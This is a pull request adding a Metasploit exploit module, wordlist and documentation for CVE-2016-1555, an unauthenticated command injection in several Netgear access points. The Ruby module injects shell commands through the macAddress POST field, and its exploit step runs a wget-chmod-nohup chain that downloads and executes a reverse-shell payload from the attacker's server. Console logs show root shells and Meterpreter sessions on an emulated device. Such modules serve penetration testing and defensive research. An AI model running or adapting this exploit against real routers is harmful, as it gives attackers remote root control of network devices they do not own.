### PR TITLE
Add module and new wordlist for it for the CVE-2016-1555 vulnerability

### DIFF
--- a/data/wordlists/netgear_boardData_paths.txt
+++ b/data/wordlists/netgear_boardData_paths.txt
@@ -1,0 +1,5 @@
+boardData102.php
+boardData103.php
+boardDataJP.php
+boardDataNA.php
+boardDataWW.php

--- a/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
+++ b/documentation/modules/exploit/linux/http/netgear_unauth_exec.md
@@ -1,0 +1,84 @@
+The module dlink_dir850_(un)auth_exec leverages an unauthenticated arbitrary command execution vulnerability to. Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 are vulnerable. The vulnerability occurs within how the router handles POST requests from (1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php. The vulnerability was discovered by Daming Dominic Chen, creator of FIRMADYNE (https://github.com/firmadyne/firmadyne).
+
+## Vulnerable Application
+
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/netgear_unauth_exec`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set SRVHOST [Your server's IP]`
+  5. Do : `set LHOST [Your IP]`
+  6. Do : `set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp` if you want meterpreter session
+  5. Do : `exploit`
+  6. If router is vulnerable, payload should be dropped via wget and executed, and you should obtain a session
+
+
+## Example with default payload (linux/mipsbe/shell_reverse_tcp)
+
+```
+msf > use exploit/linux/http/netgear_unauth_exec 
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
+RHOST => 192.168.0.100
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
+SRVHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
+LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(linux/http/netgear_unauth_exec) > 
+[*] Started reverse TCP handler on 192.168.0.99:4444 
+[+] Got 200 OK for boardDataNA.php
+[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
+[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
+[*] Sending the payload to the server...
+[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
+[+] Deleted /tmp/IXjlVHwcHNUELM
+
+msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+uname -a
+Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
+whoami
+root
+```
+
+## Example with meterpreter (linux/mipsbe/meterpreter/reverse_tcp)
+
+```
+msf > use exploit/linux/http/netgear_unauth_exec 
+msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
+RHOST => 192.168.0.100
+msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
+SRVHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
+PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
+msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
+LHOST => 192.168.0.99
+msf exploit(linux/http/netgear_unauth_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(linux/http/netgear_unauth_exec) > 
+[*] Started reverse TCP handler on 192.168.0.99:4444 
+[+] Got 200 OK for boardDataNA.php
+[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
+[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
+[*] Sending the payload to the server...
+[*] Sending stage (1108408 bytes) to 192.168.0.100
+[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
+[+] Deleted /tmp/UcyqnUAGQ
+
+msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.0.100
+OS           :  (Linux 2.6.32.70)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > 
+```

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -86,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
       File.read(datastore['URI_LIST']).each_line do |uri|
         response_get = request_get(uri.chomp)
         if response_get && response_get.code == 200
-#          print_good("Got 200 OK for #{uri.chomp}")
           return uri.chomp
         end
       end
@@ -96,16 +95,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # check for vulnerability existence
   def check
-    lhost = datastore['LHOST'] # implied
-    vuln_check_param = "ping -c 1 #{lhost}"
+    lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
+    vuln_check_param = "ping -c 1 #{lhost}" # make this an actual check instead of a ping
     target_uri = find_uri
     if target_uri == "fail"
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     else
-      print_status("Checking for existence of vulnerability in #{target_uri}...")
       response_post = request_post(target_uri,vuln_check_param)
-      if response_post && response_post.code == 200
-        print_good("Got 200 OK for #{target_uri}")
+      if response_post && response_post.code == 200 # and includes something that ensures that it's vulnerable
+        print_good("Got 200 OK for #{target_uri}") # also indicate that its vulnerable
         return Exploit::CheckCode::Vulnerable
       else
         return Exploit::CheckCode::Safe
@@ -120,7 +118,6 @@ class MetasploitModule < Msf::Exploit::Remote
     unless [CheckCode::Vulnerable].include? check
       fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
     end
-
     lhost = datastore['LHOST'].to_s
     downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
     resource_uri = '/' + downfile # the payload to be downloaded

--- a/modules/exploits/linux/http/netgear_unauth_exec.rb
+++ b/modules/exploits/linux/http/netgear_unauth_exec.rb
@@ -1,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
+      'Description' => %q{
+        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
+        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
+        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
+        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
+        arbitrary commands.
+      },
+      'Author'      =>
+        [
+          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
+          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2016-1555'],
+          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
+          ['PACKETSTORM', '135956'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
+        ],
+      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
+      'Privileged'     => true,
+      'Platform'       => 'linux',
+      'Arch'        => ARCH_MIPSBE,
+      'Payload'     => {},
+      'DefaultOptions' => {
+        'PAYLOAD'  => 'linux/mipsbe/shell_reverse_tcp',
+        'WfsDelay' => 5 },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptPath.new('URI_LIST', [true,  "The vulnerable URIs.", '/usr/share/metasploit-framework/data/wordlists/netgear_boardData_paths.txt']),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 5]),
+      ])
+    deregister_options('SSL') # because victim side does not support SSL
+    deregister_options('SSLCert') # if SSL is disabled, might as well disable this for cleaner interface
+  end
+
+  # post request
+  def request_post(uri,command)
+    response = send_request_cgi({
+      'uri'    => uri,
+      'method' => 'POST',
+      'data'   => "macAddress=000000000000;#{command};&reginfo=1&writeData=Submit\r\n"
+    })
+    return response
+  end
+
+  # get request
+  def request_get(uri)
+    response = send_request_cgi({
+      'uri'    => normalize_uri('/', uri),
+      'method' => 'GET'
+    })
+    return response
+  end
+
+  # find the vulnerable uri(s)
+  def find_uri
+    conn_check = request_get("/")
+    if not conn_check
+      return :fail
+    else
+      File.read(datastore['URI_LIST']).each_line do |uri|
+        response_get = request_get(uri.chomp)
+        if response_get && response_get.code == 200
+#          print_good("Got 200 OK for #{uri.chomp}")
+          return uri.chomp
+        end
+      end
+      return :fail.to_s
+    end
+  end
+
+  # check for vulnerability existence
+  def check
+    lhost = datastore['LHOST'] # implied
+    vuln_check_param = "ping -c 1 #{lhost}"
+    target_uri = find_uri
+    if target_uri == "fail"
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    else
+      print_status("Checking for existence of vulnerability in #{target_uri}...")
+      response_post = request_post(target_uri,vuln_check_param)
+      if response_post && response_post.code == 200
+        print_good("Got 200 OK for #{target_uri}")
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+
+  # the exploit method
+  def exploit
+    # run a check before attempting to exploit
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
+    end
+
+    lhost = datastore['LHOST'].to_s
+    downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile # the payload to be downloaded
+    service_url = service_url = 'http://' + lhost + ':' + datastore['SRVPORT'].to_s + resource_uri # the full path of the payload on our web server
+    vuln_uri = find_uri
+
+    # payload creation
+    @pl = generate_payload_exe
+    @elf_sent = false
+
+    print_status("Starting the web service on #{service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+     }})
+
+    filename = downfile
+    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; nohup /tmp/#{filename}"
+    register_file_for_cleanup("/tmp/#{filename}")
+    res = request_post(vuln_uri,cmd)
+  end
+
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+    wait_linux_payload
+  end
+
+
+  # wait for the data to be sent
+  def wait_linux_payload
+    if @elf_sent == true
+      stop_service
+    end
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      wait_time += 1
+      if (wait_time > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "Target didn't request request the ELF payload!")
+      end
+    end
+  end
+end


### PR DESCRIPTION
Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

- WN604 before 3.3.3
- WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

The corresponding wordlist file (netgear_boardData_paths.txt) contains all the URIs that might be vulnerable in the target versions. For the first vulnerable URI it finds, it "checks" for unauthenticated arbitrary command execution in the POST request.

Tested on: Netgear WNAP320 firmware 2.0.3, emulated with QEMU, setup by FIRMADYNE.

### Verification

- [x] `use exploit/linux/http/netgear_unauth_exec`, then set the RHOST, LHOST and SRVHOST options. Default payload is `linux/mipsbe/shell_reverse_tcp`. 
![pull1](https://user-images.githubusercontent.com/21966757/46592770-c2418800-caeb-11e8-8a05-b922f4baad56.PNG)

- [x] Meterpreter for MIPSBE works fine too:
![pull2](https://user-images.githubusercontent.com/21966757/46592703-4e9f7b00-caeb-11e8-932d-8d1a9e3aa5af.PNG)

- [x] No vulnerable URI means that it automatically fails, for both `exploit` and `check`:
![pull3](https://user-images.githubusercontent.com/21966757/46592742-93c3ad00-caeb-11e8-96c5-efd05e8bf6b5.png)

- [x] Basic documentation can be found at the `documentation/modules/exploit/linux/http/netgear_unauth_exec.md` file

### Example Output with default payload (linux/mipsbe/shell_reverse_tcp)
```
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
[*] Sending the payload to the server...
[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
[+] Deleted /tmp/IXjlVHwcHNUELM

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
whoami
root
```

### Example Output with meterpreter
```
msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
[*] Sending the payload to the server...
[*] Sending stage (1108408 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
[+] Deleted /tmp/UcyqnUAGQ

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.0.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```

### TODO LIST
- [ ] Actually check for firmware version and vulnerability existence before launching the exploit. Other firmwares from Netgear may also have the same URIs, but might not be vulnerable. The check I used in this module right now is super quick and dirty, not very good at all. (Maybe using the command execution to return some form of verification back to the attacker? Could SNMP work?).
- [ ] Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created.
- [ ] When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always `boardDataWW.php`.
- [ ] Test the module against the latest vulnerable firmware versions (WN604 firmware 3.3.3 and WNAP320 firmware 3.5.5.0)